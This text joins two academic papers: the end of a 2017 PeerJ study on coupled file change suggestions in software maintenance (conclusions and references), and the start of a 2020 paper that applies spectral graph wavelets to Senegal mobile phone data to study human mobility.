However, this practice is used very often today. We can find many projects in various on-line software repository collections like GitHub using this kind of mapping and providing issue and project description. We chose simple perfective tasks that can be easily replicated and do not require large changes in the source code. The description of the tasks is simple and includes the source code functionalities to be changed and the activities without any specific format or structure. This way we maintain the possibility to repeat the process for other projects and limit the possibility of creating artificial conditions specially tailored for our experiment. Yet, it is not clear whether the results can be generalized for other types of maintenance tasks. The student participants in the experiment have basic programming experience which corresponds to the target group of our study to address inexperienced developers. The system we used for the experiment is an open source Java project with a clear project structure and repository. It does not contain specific information that can challenge the replication of the analysis. CONCLUSION AND FUTURE WORK From the provided results, we summarize that the coupled file change approach was successfully tested in the performed experiment. The participants working with coupled change suggestions provided significantly more correct solutions than the participants without these suggestions. The participants using coupled file change suggestions did not manage to solve their tasks significantly faster in comparison to the participants working only with the issue descriptions. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 27/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 We conclude that the coupled file change suggestions can be positively judged to be useful for inexperienced developers working on perfective maintenance tasks. The influence is particularly positive on the correctness of the solutions. The influence of the coupled change suggestions on the effort for solving the tasks is much lower than on the correctness of the solutions. Considering the time needed for the selection of the coupled files as part of the task solution procedure, the use of the coupled files does not give any advantage. We extended the findings of Ramadani & Wagner (2016) where the participants judged the coupled file changes and the attributes as neutral to use in maintenance tasks. Our experiment outcomes are more positive compared to the results in Ramadani & Wagner (2016). Working on real maintenance tasks and a real software product increases the acceptance of coupled change suggestions by the developers. Also, we rounded up the set of useful attributes based on the set of attributes presented in this study. The next steps would be to transform the results and the findings into full-fledged tool implementation to support the developers working on maintenance tasks with the visual presentation of suggestions of the files they should also change. The final set of attributes presented in the tool should be adjustable so the developers will not be overwhelmed with information which could negate the positive effect we have found in this study. ACKNOWLEDGEMENTS We would like to thank Dr. Asim Abdulkhaleq for his help in the evaluation of the coupled files, the tasks and their solutions, the process of scoring and the analysis of the questionnaires. We also thank Nakharin Donsupae, Dominik Kesim and Adrian Weller for their help in the process of selecting the coupled files. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Jasmin Ramadani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Stefan Wagner conceived and designed the experiments, performed the experiments, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The raw data has been supplied as a Supplementary File. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 28/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135#supplemental-information http://dx.doi.org/10.7717/peerj-cs.135 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.135#supplemental-information. REFERENCES Abran A, Nguyenkim H. 1991. Analysis of maintenance work categories through measurement. In: Proceedings of the international conference on software maintenance. Washington, D.C.: IEEE, 104–113 DOI 10.1109/ICSM.1991.160315. Agrawal R, Srikant R. 1994. Fast algorithms for mining association rules in large databases. In: Bocca JB, Jarke M, Zaniolo C, eds. Proceedings of the international conference on very large data bases. San Francisco: Morgan Kaufmann Publishers Inc., 487–499. Armstrong RA. 2014. When to use the Bonferroni correction. Ophthalmic and Physiologi- cal Optics 34(5):502–508 DOI 10.1111/opo.12131. Basili VR. 1990. Viewing maintenance as reuse-oriented software development. IEEE Software 7:19–25 DOI 10.1109/52.43045. Basili VR, Caldiera G, Rombach HD. 1994. The goal question metric approach. In: Encyclopedia of software engineering. Los Alamitos: John Wiley and Sons, Inc. Bavota G, Dit B, Oliveto R, Di Penta M, Poshyvanyk D, De Lucia A. 2013. An Empirical study on the developers perception of software coupling. In: Notkin D, Cheng BHC, Pohl K, eds. Proceedings of the international conference on software engineering. Washington, D.C.: IEEE, 692–701. Bieman J, Andrews A, Yang H. 2003. Understanding change-proneness in OO software through visualization. In: Proceedings of the IEEE international workshop on program comprehension. Washington, D.C.: IEEE, 44–53 DOI 10.1109/WPC.2003.1199188. Bird C, Rigby PC, Barr ET, Hamilton DJ, Germán DM, Devanbu PT. 2009. The promises and perils of mining git. In: Proceedings of the working conference on mining software repositories. Washington, D.C.: IEEE, 1–10 DOI 10.1109/MSR.2009.5069475. Briand L, Morasca S, Basili V. 2002. An operational process for goal-driven defi- nition of measures. IEEE Transactions on Software Engineering 28:1106–1125 DOI 10.1109/TSE.2002.1158285. Canfora G, Cerulo L. 2005. Impact analysis by mining software and change request repositories. In: Proceedings of the IEEE international software metrics symposium (METRICS’05). Washington, D.C.: IEEE, 9–29 DOI 10.1109/METRICS.2005.28. Carlsson E. 2013. Mining git repositories: an introduction to repository mining. Available at https://www.diva-portal.org/smash/get/diva2:638844/FULLTEXT01.pdf (accessed on 13 March 2017). Chan T. 2008. Impact of programming and application-specific knowledge on mainte- nance effort: a hazard rate model. In: Proceedings of the IEEE international conference on software maintenance. Beijing: IEEE, 47–56 DOI 10.1109/ICSM.2008.4658053. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 29/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135#supplemental-information http://dx.doi.org/10.7717/peerj-cs.135#supplemental-information http://dx.doi.org/10.1109/ICSM.1991.160315 http://dx.doi.org/10.1111/opo.12131 http://dx.doi.org/10.1109/52.43045 http://dx.doi.org/10.1109/WPC.2003.1199188 http://dx.doi.org/10.1109/MSR.2009.5069475 http://dx.doi.org/10.1109/TSE.2002.1158285 http://dx.doi.org/10.1109/METRICS.2005.28 https://www.diva-portal.org/smash/get/diva2:638844/FULLTEXT01.pdf http://dx.doi.org/10.1109/ICSM.2008.4658053 http://dx.doi.org/10.7717/peerj-cs.135 Cohen J. 1988. Statistical power analysis for the behavioral sciences. L Hillsdale: Lawrence Erlbaum Associates. Coolican H, Taylor F. 2009. Research methods and statistics in psychology. London: Hodder Education. D’Ambros M, Lanza M, Robbes R. 2009. On the relationship between change coupling and software defects. In: Proceedings of the working conference on reverse engineering. Washington, D.C.: IEEE, 135–144 DOI 10.1109/WCRE.2009.19. De Lucia A, Pompella E, Stefanucci S. 2002. Effort estimation for corrective software maintenance. In: Proceedings of the international conference on software engineering and knowledge engineering. New York: Association for Computing Machinery, 409–416 DOI 10.1145/568760.568831. Fischer M, Pinzger M, Gall H. 2003. Populating a release history database from version control and bug tracking systems. In: Proceedings of the international conference on software maintenance. Washington, D.C.: IEEE, 23 DOI 10.1109/ICSM.2003.1235403. Fluri B, Gall H, Pinzger M. 2005. Fine-grained analysis of change couplings. In: Pro- ceedings of the IEEE international workshop on source code analysis and manipulation. Washington, D.C.: IEEE, 66–74 DOI 10.1109/SCAM.2005.14. Fournier-Viger P. 2013. How to auto-adjust the minimum support threshold according to the data size. Available at http://data-mining.philippe-fournier-viger.com/ (accessed on 13 March 2017). Fritz CO, Morris PE, Richler JJ. 2012. Effect size estimates: Current use, calcula- tions, and interpretation. Journal of Experimental Psychology: General 141:2–18 DOI 10.1037/a0024338. Gall H, Hajek K, Jazayeri M. 1998. Detection of logical coupling based on product release history. In: Proceedings of the international conference on software maintenance. Washington, D.C.: IEEE, 190 DOI 10.1109/ICSM.1998.738508. Gall H, Jazayeri M, Krajewski J. 2003. CVS release history data for detecting logical couplings. In: Proceedings of the international workshop on principles of software evolution. Washington, D.C.: IEEE, 13–23 DOI 10.1109/IWPSE.2003.1231205. German DM. 2004. Mining CVS repositories, the softchange experience. In: Pro- ceedings of the international workshop on mining software repositories. 17–21 DOI 10.1049/ic:20040469. Györödi C, Györödi R. 2004. A comparative study of association rules mining algo- rithms. Available at http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.123. 2771rep=rep1type=pdf (accessed on 13 March 2017). Han J. 2005. Data mining: concepts and techniques. Burlington: Morgan Kaufmann Publishers Inc. Han J, Pei J, Yin Y. 2000. Mining frequent patterns without candidate genera- tion. In: Proceedings of the ACM SIGMOD international conference on man- agement of data. New York: Association for Computing Machinery, 1–12 DOI 10.1145/335191.335372. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 30/33 https://peerj.com http://dx.doi.org/10.1109/WCRE.2009.19 http://dx.doi.org/10.1145/568760.568831 http://dx.doi.org/10.1109/ICSM.2003.1235403 http://dx.doi.org/10.1109/SCAM.2005.14 http://data-mining.philippe-fournier-viger.com/ http://dx.doi.org/10.1037/a0024338 http://dx.doi.org/10.1109/ICSM.1998.738508 http://dx.doi.org/10.1109/IWPSE.2003.1231205 http://dx.doi.org/10.1049/ic:20040469 http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.123.2771rep=rep1type=pdf http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.123.2771rep=rep1type=pdf http://dx.doi.org/10.1145/335191.335372 http://dx.doi.org/10.7717/peerj-cs.135 Hanlon B, Larget B. 2011. Analysis of variance. Available at http://www.stat.wisc.edu/ ~st571-1/13-anova-4.pdf (accessed on 2 June 2017). Hassan AE. 2008. The road ahead for Mining Software Repositories. In: Frontiers of software maintenance, 2008. FoSM 2008. Washington, D.C.: IEEE, 48–57. Hassan AE, Holt RC. 2004. Predicting change propagation in software systems. In: Proceedings of the IEEE international conference on software maintenance. Washington, D.C.: IEEE, 284–293 DOI 10.1109/ICSM.2004.1357812. Hattori L, Dos Santos Jr G, Cardoso F, Sampaio M. 2008. Mining software repositories for software change impact analysis: a case study. In: Proceedings of the Brazilian symposium on databases. Porto Alegre: Sociedade Brasileira de Computação, 210–223. Hindle A, German DM, Holt R. 2008. What do large commits tell us?: a taxonomical study of large commits. In: Proceedings of the 2008 international working conference on mining software repositories. New York: Association for Computing Machinery, 99–108 DOI 10.1145/1370750.1370773. Hutton A, Welland R. 2007. An experiment measuring the effects of maintenance tasks on program knowledge. In: Kitchenham B, Brereton P, Turner M, eds. Proceedings of the international conference on evaluation and assessment in software engineering. London: British Computer Society, 43–52. IEEE. 1998. IEEE standard for software maintenance. IEEE Std 1219-1998. Washington, D.C.: IEEE. ISO/IEC ISO/IEC 14764: Software Engineering-Software Maintenance. 2006. Available at https://www.iso.org/standard/39064.html (accessed on 13 March 2017). ISO/IEC ISO/IEC 12207: information Technology-Software life cycle processes. 2008. Available at https://www.iso.org/standard/43447.html (accessed on 13 March 2017). Kagdi H. 2007. Improving change prediction with fine-grained source code mining. In: Proceedings of the IEEE/ACM international conference on automated software engineering. Washington, D.C.: IEEE, 559–562 DOI 10.1145/1321631.1321742. Kagdi H, Yusuf S, Maletic JI. 2006. Mining sequences of changed-files from version histories. In: Proceedings of the international workshop on mining software repositories. Washington, D.C.: IEEE, 47–53 DOI 10.1145/1137983.1137996. Lientz BP, Swanson EB. 1980. Software maintenance management. Boston: Addison- Wesley Longman Publishing Co., Inc. Nachar N. 2008. The Mann–Whitney U: a test for assessing whether two independent samples come from the same distribution. Tutorials in Quantitative Methods for Psychology 4:13–20 DOI 10.20982/tqmp.04.1.p013. Nguyen V, Boehm B, Danphitsanuphan P. 2011. A controlled experiment in assessing and estimating software maintenance tasks. Information and Software Technology 53:682–691 DOI 10.1016/j.infsof.2010.11.003. Pigoski TM. 1996. Practical software maintenance: best practices for managing your software investment. 1st Edition. Hoboken: Wiley Publishing. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 31/33 https://peerj.com http://www.stat.wisc.edu/~st571-1/13-anova-4.pdf http://www.stat.wisc.edu/~st571-1/13-anova-4.pdf http://dx.doi.org/10.1109/ICSM.2004.1357812 http://dx.doi.org/10.1145/1370750.1370773 https://www.iso.org/standard/39064.html https://www.iso.org/standard/43447.html http://dx.doi.org/10.1145/1321631.1321742 http://dx.doi.org/10.1145/1137983.1137996 http://dx.doi.org/10.20982/tqmp.04.1.p013 http://dx.doi.org/10.1016/j.infsof.2010.11.003 http://dx.doi.org/10.7717/peerj-cs.135 Pohlert T. 2014. The pairwise multiple comparison of mean ranks package. Available at https://cran.r-project.org/web/packages/PMCMR/vignettes/PMCMR.pdf (accessed on 13 March 2017). Purushothaman R, Perry DE. 2005. Toward understanding the rhetoric of small source code changes. IEEE Transactions on Software Engineering 31(6):511–526 DOI 10.1109/TSE.2005.74. Ramadani J, Wagner S. 2016. Are suggestions of coupled file changes interesting? In: Maciaszek L, Filipe J, eds. Proceedings of the international conference on evaluation of novel software approaches to software engineering. Setúbal: ENASE, 15–26 DOI 10.5220/0005854400150026. Revelle M, Gethers M, Poshyvanyk D. 2011. Using structural and textual information to capture feature coupling in object-oriented software. Empirical Software Engineering 16:773–811 DOI 10.1007/s10664-011-9159-7. Ricca F, Leotta M, Reggio G, Tiso A, Guerrini G, Torchiano M. 2012. Using UniMod for maintenance tasks: an experimental assessment in the context of model driven development. In: Proceedings of the international workshop on modeling in software engineering. Piscataway: IEEE Press, 77–83 DOI 10.1109/MISE.2012.6226018. Shelly GB, Cashman TJ, Rosenblatt HJ. 1998. Systems analysis and design. 3rd Edition. Cambridge: International Thomson Publishing. Shirabad J, Lethbridge T, Matwin S. 2003. Mining the maintenance history of a legacy software system. In: Proceedings of the international conference on software mainte- nance. Washington, D.C.: IEEE, 95–104 DOI 10.1109/ICSM.2003.1235410. Stafford JA. 2003. Software maintenance as part of the software life cycle. Available at http://hepguru.com/maintenance/Final_121603_v6.pdf (accessed on 13 March 2017). Stevens WP, Myers GJ, Constantine LL. 1974. Structured design. IBM Systems Journal 13:115–139 DOI 10.1147/sj.132.0115. Swanson EB. 1976. The dimensions of maintenance. In: Proceedings of the international conference on software engineering. Los Alamitos: IEEE, 492–497. Tomczak M, Tomczak E. 2014. The need to report effect size estimates revisited. An overview of some recommended measures of effect size. Trends in Sport Sciences 21:19–25. Van Rysselberghe F, Demeyer S. 2004. Mining Version Control Systems for FACs (frequently Applied changes). In: Hassan AE, Holt RC, Mockus A, eds. Proceedings of the international workshop on mining repositories. 48–52. Van Vliet H, Van Vliet H, Van Vliet J. 1993. Software engineering: principles and practice. New York: Wiley. Wu R, Zhang H, Kim S, Cheung S-C. 2011. ReLink: recovering links between bugs and changes. In: Proceedings of the ACM SIGSOFT symposium and the 13th european con- ference on foundations of software engineering. New York: Association for Computing Machinery, 15–25 DOI 10.1145/2025113.2025120. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 32/33 https://peerj.com https://cran.r-project.org/web/packages/PMCMR/vignettes/PMCMR.pdf http://dx.doi.org/10.1109/TSE.2005.74 http://dx.doi.org/10.5220/0005854400150026 http://dx.doi.org/10.1007/s10664-011-9159-7 http://dx.doi.org/10.1109/MISE.2012.6226018 http://dx.doi.org/10.1109/ICSM.2003.1235410 http://hepguru.com/maintenance/Final_121603_v6.pdf http://dx.doi.org/10.1147/sj.132.0115 http://dx.doi.org/10.1145/2025113.2025120 http://dx.doi.org/10.7717/peerj-cs.135 Ying ATT, Murphy GC, Ng RT, Chu-Carroll M. 2004. Predicting source code changes by mining change history. IEEE Transactions on Software Engineering 30:574–586 DOI 10.1109/TSE.2004.52. Zimmermann T, Kim S, Zeller A, Whitehead Jr EJ. 2006. Mining version archives for co-changed lines. In: Proceedings of the international workshop on mining software repositories. New York: Association for Computing Machinery, 72–75 DOI 10.1145/1137983.1138001. Zimmermann T, Weisgerber P, Diehl S, Zeller A. 2004. Mining version histories to guide software changes. In: Proceedings of the international conference on soft- ware engineering. New York: Association for Computing Machinery, 563–572 DOI 10.1145/1137983.1138001. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 33/33 https://peerj.com http://dx.doi.org/10.1109/TSE.2004.52 http://dx.doi.org/10.1145/1137983.1138001 http://dx.doi.org/10.1145/1137983.1138001 http://dx.doi.org/10.7717/peerj-cs.135 work_6tznbs2z2jf6rownybxrorcdsu ---- Identifying multiscale spatio-temporal patterns in human mobility using manifold learning Identifying multiscale spatio-temporal patterns in human mobility using manifold learning James R. Watson, Zach Gelbaum, Mathew Titus, Grant Zoch and David Wrathall College of Earth, Ocean and Atmospheric Sciences, Oregon State University, Corvallis, OR, USA ABSTRACT When, where and how people move is a fundamental part of how human societies organize around every-day needs as well as how people adapt to risks, such as economic scarcity or instability, and natural disasters. Our ability to characterize and predict the diversity of human mobility patterns has been greatly expanded by the availability of Call Detail Records (CDR) from mobile phone cellular networks. The size and richness of these datasets is at the same time a blessing and a curse: while there is great opportunity to extract useful information from these datasets, it remains a challenge to do so in a meaningful way. In particular, human mobility is multiscale, meaning a diversity of patterns of mobility occur simultaneously, which vary according to timing, magnitude and spatial extent. To identify and characterize the main spatio-temporal scales and patterns of human mobility we examined CDR data from the Orange mobile network in Senegal using a new form of spectral graph wavelets, an approach from manifold learning. This unsupervised analysis reduces the dimensionality of the data to reveal seasonal changes in human mobility, as well as mobility patterns associated with large-scale but short-term religious events. The novel insight into human mobility patterns afforded by manifold learning methods like spectral graph wavelets have clear applications for urban planning, infrastructure design as well as hazard risk management, especially as climate change alters the biophysical landscape on which people work and live, leading to new patterns of human migration around the world. Subjects Agents and Multi-Agent Systems, Algorithms and Analysis of Algorithms, Data Science, Network Science and Online Social Networks, Spatial and Geographic Information Systems Keywords Complex systems, Manifold learning, Human mobility, Dimension reduction, Prediction, Geographic information science, Multiscale, Emergence, Wavelet, Networks INTRODUCTION Human mobility is a fundamental part of how individuals, households and communities organize to meet every-day needs, and to respond to infrequent risks and shocks like economic instability and environmental hazards. Human mobility is multiscale in nature (Song et al., 2010a), that is for any given type of mobility, such as commuting, seasonal migration or holiday travels, individuals move as part of social collectives of varying size and interconnectivity, which span different magnitudes of spatial and temporal scale. Human mobility also has multiple spatio-temporal modes of variability: people go to work each day, they go on holiday during specific programed periods within the year, they may How to cite this article Watson JR, Gelbaum Z, Titus M, Zoch G, Wrathall D. 2020. Identifying multiscale spatio-temporal patterns in human mobility using manifold learning. PeerJ Comput. Sci. 6:e276 DOI 10.7717/peerj-cs.276 Submitted 23 October 2019 Accepted 22 April 2020 Published 15 June 2020 Corresponding author James R. Watson, james.watson@oregonstate.edu Academic editor Chakchai So-In Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.276 Copyright 2020 Watson et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.276 mailto:james.�watson@�oregonstate.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.276 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ migrate before and after key agricultural seasons, or they may evacuate during floods or other environmental hazards (Widhalm et al., 2015). For these reasons and others, it is a continuing challenge to identify, categorize and anticipate the various patterns of human mobility (Simini et al., 2012). Anticipating and planning for human mobility is a non-trivial task for organizations whose core functions provide critical services to and address the needs of moving people, such as urban planning and transport agencies, disaster first-responders and international aid organizations (Jiang, Ferreira & Gonzalez, 2017). To overcome these challenges and generate fundamental insight on human mobility, novel data generated by users of the digital infrastructure (e.g., mobile phone subscribers) is now being used. So-called Big Data, routinely collected from a range of sources, including social platforms like Twitter, Flickr and Facebook (Barbosa et al., 2018) and most notably the explosion of mobile phone usage throughout the world, provides rich information on users’ locations through time (Giannotti et al., 2011). Mobile network operators collect records of their users’ calling patterns, a type of data called Call Detail Records (CDR), which include the location of the receiving tower where each voice call or text message is made, as well as the location of the recipient. Over time, each user’s calling patterns can be used to reconstruct a detailed record of their location history. The collective mobility history of all users’ movements through time provides insight on total population flows between all cellular network locations during any specified period of time. This enables the study of users’ behaviors at very high spatiotemporal resolution over both local and system-level spatial scales at time scales of minutes to months to years (Song et al., 2010b). As each phone is embedded within an existing social fabric, CDR allow the analysis of the changing structure of social organization as people (i.e., individuals, social networks, communities, religious and ethnic groups, etc.) respond to a diversity of stimuli. CDR data has been used for urban planning (Becker et al., 2011), and to describe and evaluate commuting (Iqbal et al., 2014) and environmental displacement resulting from earthquakes and hurricanes (Lu et al., 2016; Lu, Bengtsson & Holme, 2012). They have also been used to evaluate mobility as a vector for the spread of infectious diseases such as ebola (Wesolowski et al., 2014a, 2014b; Balcan et al., 2009; Belik, Geisel & Brockmann, 2011). CDR data offer a vastly clearer and more detailed description of the communication and mobility behaviors of people as they go about their daily lives, compared to traditional data on human mobility, such as surveys and censuses, which are collected at relatively coarse time-scales, that is, months and years (Bell & Ward, 2000). CDRs are compiled by network operators principally for the purposes of billing customers for their use of the network, not for scientific analysis; therefore, the main challenge with analyzing CDR is the size, complexity and richness of datasets. CDR are inherently high dimensional and noisy (Chen & Zhang, 2014), and quantitative analyses must incorporate dimensional reduction and denoising approaches. Once done, the remaining challenge is retrieving a relevant signal from the data at the appropriate spatial and temporal scale for each specific mobility pattern (Song et al., 2010b). Here, we describe a data-driven approach to CDR analysis that explicitly addresses the multiscale nature of the mobility patterns embedded in the data and reflected in Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 2/17 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ the system under study. We analyzed CDR from users of the Orange/Sonatel cellular network, collected in Senegal between 1 January and 31 December 2013 (see Fig. 1 for an illustration of mobility in Senegal for a given day). De-identified data entries included information on the time of the call, the mobile phone tower used and the duration of call. To identify and characterize different spatio-temporal modes of human mobility captured in CDR, we developed a novel computational approach based on spectral graph wavelets, an extension of classical wavelet analysis to the setting of networks. There are now numerous examples of where CDR data has been used to understand patterns of human mobility (Jarv, Ahas & Witlox, 2014; Calabrese et al., 2013; Dobra, Williams & Eagle, 2015), including those that also explicitly address multiscale patterns (Phithakkitnukoon, Smoreda & Olivier, 2012) using methods from statistical physics (Lambiotte et al., 2008; Simini et al., 2012). Here, we have made new mathematical advances to spectral graph wavelets to improve upon these state of the art approaches to the multiscale decomposition of CDR data. In doing so we were able to identify and characterize various multiscale spatio-temporal patterns of human mobility in Senegal for the year 2013. To demonstrate the utility of our approach we focused on dynamic multiscale mobility patterns to/from a specific city in Senegal—Touba, a market town and religious center in Senegal’s agricultural breadbasket. Our goal was to identify and characterize the Figure 1 Map of Senegal with major cellular communication towers: these are the nodes in our human mobility networks. Nodes are color coded and sized by population density and edges connect- ing them highlight the density and complexity of human communication and mobility networks. These networks are changing over time, and in Senegal there are many large-scale mobility events, relating to religious events (often held at Touba, the focal city of this study) as well as to seasonal changes in weather and agriculture. Full-size DOI: 10.7717/peerj-cs.276/fig-1 Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 3/17 http://dx.doi.org/10.7717/peerj-cs.276/fig-1 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ different spatio-temporal patterns of human mobility that contrast in overall spatial scale and temporal duration. We focus on inter-city forms of mobility to/from Touba, including seasonal migration relating to changes in agriculture and a mobile labor force, as well as punctuated patterns relating to calendar festivals, local elections, or religious holidays. The identification and interpretation of these spatio-temporal scales and patterns of human mobility is of value to the ultimate goal of extracting key dynamics from complex adaptive systems in general. METHODS Human mobility data To analyze the multiscale nature of human mobility, we developed a new approach to spectral graph wavelets which we then applied to de-identified, pre-processed extracts of CDR from the Orange/Sonatel mobile network in Senegal generated between January 1 and December 31, 2013. These data were obtained from the Orange Telecom Data for Development Challenge (D4D) and are highly sensitive. As a consequence they cannot be made publicly available, but can be obtained by contacting Orange. These data include a number of variables on individual mobility behaviors/locations for 300,000 randomly sampled users on a rolling 2-week basis. These data were arranged into a pairwise origin-destination network whose vertices, or nodes, are cell towers and whose edges are weighted by the volume of phones moving/flowing between each tower pair for each 24-h period over the entire year of 2013. To highlight inter-city mobility, we first aggregated the cell towers of key cities into single nodes, following administrative boundaries. Then, for each 24 h period, a one was added to a given edge i,j if a phone moved from node i to node j. To further filter out intra-city mobility, repeated trips between the same towers for the same user within a 24-period were not counted. This effectively removes “double” trips, and leaves the one-way trips, for example home-work commutes. After all this, mobility was defined and quantified as an asymmetric affinity matrix A varying through time, where Aij(t) is the total number of unique trips made by users between towers i and j on day t of 2013 (see Fig. 1A for a geographic representation for one of these daily affinity matrices). In order to normalize the data so that the signal from high volume mobility in areas such as Dakar, the capital of Senegal, did not wash out all other signals, we calculated relative mobility by dividing the entries of A(t), by their respective row sums. In this way the number of trips on a given day from a given node are now weighted by the amount of people moving from that node. In order to perform the SGW analysis, we then converted this asymmetric affinity matrix to a symmetric one by taking the average of two-way mobility patterns between pairs of cell-towers. Last, so as to not include intra-city traffic, we set the diagonal of A to zero. The result was a symmetric affinity matrix/network with zeros on the diagonal for every day of 2013. Multiscale analysis using spectral graph wavelets Networks of human mobility and communication are naturally modeled by graphs, sets of nodes connected by edges, each with an associated weight representing the strength of the connection. Here, higher edge weights indicate a greater flow of human migration Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 4/17 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ between the edge’s two endpoints. Graphs can be viewed as discrete analogs of smooth objects such as geometric manifolds and surfaces, and the geometric content of these graphs is often analyzed using an associated Laplacian operator (Chung, 1997; Coifman & Lafon, 2006), as it encodes the structure of the graph in a natural way. In particular, its eigenfunctions can be used to construct a family of wavelets, which allows one to decompose functions in the same spirit as the indispensable Fourier analytic approach to time series analysis. This is the starting point of our study. In Fourier analysis, one uses eigenfunctions {ϕk} of the Laplacian as basis vectors and their associated eigenvalues {λk} inform us of the functions’ features: larger eigenvalues are associated to higher frequency or, equivalently, smaller scale variations, and lower eigenvalues correspond to the large-scale features. These functions ϕk are, however, supported across the entire domain in question, and so a function’s Fourier coefficients ck ¼ hfk; f i, integrate features from disparate regions in the domain. Wavelet families, on the other hand, allow one to perform a similar analysis while restricting attention to a local region defined by a central point and a scale, or radius. Given that human mobility networks are inherently multiscale as well as highly heterogeneous, a method is required that is both multiscale and localized. In the classical settings of time series analysis and image analysis, wavelets were developed to exhibit precisely these two traits. Here we employed a generalization of wavelets to graphs, called spectral graph wavelets. Spectral graph wavelets have been previously used to study human mobility, for example automobile traffic (Mohan et al., 2014), in analyzing human mobility from photo activity via Flickr (Dong et al., 2013), and in general clustering and community detection (Tremblay & Borgnat, 2013). An important first choice to make when employing spectral graph wavelets is the shape of the wavelet to be used, or in other words the “wavelet kernel". This can have a profound effect on the analysis. In particular, we employed a wavelet kernel based specifically on the heat kernel yielding what we call Hermitian Graph Wavelets (for details of the mathematical analysis see: Gelbaum, Titus & Watson, 2019), which allows us to associate explicit radii to the wavelets rather than a scale parameter that is independent of any metric on the graph. By using these wavelets, we were able to produce a data analysis method that efficiently extracted key geometric information from the time-varying human mobility networks A(t). This approach provides a decomposition whose components may be ordered by importance. Whereas in a Fourier decomposition the largest coefficients ck indicate the eigenfunctions which contain most of the original function’s information, in the present study the norm of the wavelet gives a measure of the gross data encoded by it. The outputs of this analysis are a set of wavelet functions associated to each vertex (i.e. for every cell tower in Senegal), as well as a single dominant scale for each vertex representing the scale containing the most information for that vertex. By fixing a choice of vertex and observing how the wavelet at the dominant scale evolves over time we have a vastly simplified geometric summary of how the graph structure is changing near the focal vertex. As a result, these wavelet functions are rich in multiscale geometric content, and we used Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 5/17 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ them to identify and characterize different forms or modes of human mobility that occur throughout Senegal over the year 2013. Applying spectral graph wavelets to mobility networks Given the set of daily affinity matrices, A(t), the application of Spectral Graph Wavelets is as follows. First, for each of the daily affinity matrices, we constructed their associated Laplacian matrices: DðtÞ ¼ DðtÞ � AðtÞ where DðtÞii ¼ P j ðAðtÞÞi;j and D(t)ij = 0 for i ≠ j. Once done, the eigenvectors and eigenvalues of δ(t), {ϕk,t} and {λk,t} respectively, were then computed. Then, Hermitian graph wavelets were formed as: cs;xðyÞ ¼ X k s�kðtÞe�s�kðtÞfk;tðxÞfk;tðyÞ (1) for a chosen set of scales s∈{sn} (note that ψs,x(y) = ψs,y(x)). These functions exhibit several properties that make them ideal for decomposing signals measured on large and complex networks: they are localized, in that they provide information for every node, and the power of each wavelet (i.e., its norm, as a vector) gives us a measure of its importance with respect to the global network structure (Gelbaum, Titus & Watson, 2019). This is analogous to classical Fourier analysis where large Fourier coefficients in the decomposition of a function indicate the major modes comprising the function. Rather than forming an orthonormal set, the wavelet functions {ψsn,x} form a frame and rather than the classical Parseval equality, an approximate Parseval equality holds: for a function f on the network there are constants 0 < B < C < ∞ with Bkf k2 � X sn;x jhf ; csn;xij 2 � Ckf k2 where kf k2 ¼ X x jf ðxÞj2 with the sum taken over all nodes x in the network. The values of B and C depend both on choice of wavelet kernel and the scales chosen. It is always possible to choose scales and (by renormalizing if necessary) achieve a frame with the values of B and C as close to 1 as desired (Hammond, Vandergheynst & Gribonval, 2011). The determination of the scales {sn} input into the algorithm is largely ad hoc and some trial and error is required. While it is up to the investigator to make this choice, some general points can be made: the chosen scales should always be positive and the largest should not be too much bigger than the largest eigenvalue. The goal is to get a good partitioning of the interval [0, max {λ(t) }] relative to the spacing of the eigenvalues, but as the eigenvalues are in general not uniformly spaced some experimentation may be required to find the resolution that is most informative. Having a well distributed set of scales will also ensure that the Watson et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.276 6/17 http://dx.doi.org/10.7717/peerj-cs.276 https://peerj.com/computer-science/ calculation of wavelet power is not sensitive to small changes in the network’s structure or the specific scales chosen. In other words, calculations will be stable. With an appropriately chosen set of scales, if we let f be a delta function at node z, f = δz(meaning f(z) = 1 and f(x) = 0 for all other nodes x ≠ z), the above Parseval bounds and ψs,x(y) = ψs,y(x) symmetry imply that 1 ¼ kf k2 � X sn;x jhf ; csn;xij 2 ¼ X sn X x jcsn;zðxÞj 2 ¼ X sn kcsn;zk 2 